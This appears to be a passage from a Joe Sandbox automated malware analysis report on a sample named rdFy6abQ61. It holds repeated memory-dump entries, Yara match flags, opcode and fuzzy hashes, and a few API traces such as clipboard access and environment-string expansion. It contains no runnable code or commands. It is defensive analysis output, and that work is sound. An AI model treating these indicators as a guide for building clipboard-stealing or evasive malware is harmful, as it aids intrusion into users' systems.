                                                                              • Instruction Fuzzy Hash: 2C31F2766183418BD708CF39C89136BBBE2AB86318F18CA6DE4D1D7384D73C88458B92
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction ID: 27dd1a5319b153adaea54c6c506fbe7cfd38c0fe84188b5e08dc7471a6ebbe9f
                                                                              • Opcode Fuzzy Hash: eaf3a552830be57f3b076121e3f4128acb6b5eaa3b8ddd6eb86dc69abef60401
                                                                              • Instruction Fuzzy Hash: 9D31E4766583418BD718CF39C89136BBBE2AB86318F18CA6DE4D1D7284D73CC405CB52
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                              • Instruction ID: 4d6f8d4a3a0c9291bd82fbf102df9c74bb0e146b1c020dae9dd1e6f681f2a276
                                                                              • Opcode Fuzzy Hash: b124762bb82201bc91150ff6a1fbec5ae2415c41406e4d3524ac183859c93793
                                                                              • Instruction Fuzzy Hash: D921E1369583A04BE3348F359C913DBBBE2ABC6314F09872DC8D817285DB7A1805CBC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction ID: 34218d49f98f4d04757d6d7688404ab739ac49d953720a668d3546879b641f63
                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction Fuzzy Hash: 7411EC336491D40EC7158D3C8400566BF930A97735F1993DAF4F4973D2D52B8D8E835A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                              • Instruction ID: e2b1fa06f32b2fd48b90287ee0e38661db697dc0127cfdde8b5722762f88e760
                                                                              • Opcode Fuzzy Hash: 5b0bd2af23d8aba3338285f4a2fcfdf2a171a9890d65b304db72d3eef606dba8
                                                                              • Instruction Fuzzy Hash: 440192F170171197DA209E15A5C172BB2A85F90708F18543ED84457342EB7DEC08C2DD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                              • Instruction ID: 3fcfc28ea947c380bfae22392bc82e73eaf8ae6db758c2c9418c9698c3294411
                                                                              • Opcode Fuzzy Hash: ac742f35869d0ed4235e03d9c95948d21c80b525ab38d32b7d308f9413da626c
                                                                              • Instruction Fuzzy Hash: 340184F1A403014BEB30AE5484C0B37B2A9AF91714F18423FD81A5B680DBB6E805EFDD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878168519.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_5e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock
• String ID:
• API String ID: 1006321803-0
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0042561D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
Similarity
• API ID: EnvironmentExpandStrings
• String ID: $%$p:#$MO
• API String ID: 237503144-3521940197
APIs
• RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02105884
Strings
Memory Dump Source
• Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
Yara matches
Similarity
• API ID: EnvironmentExpandStrings
• String ID: $%$p:#$MO
• API String ID: 237503144-3521940197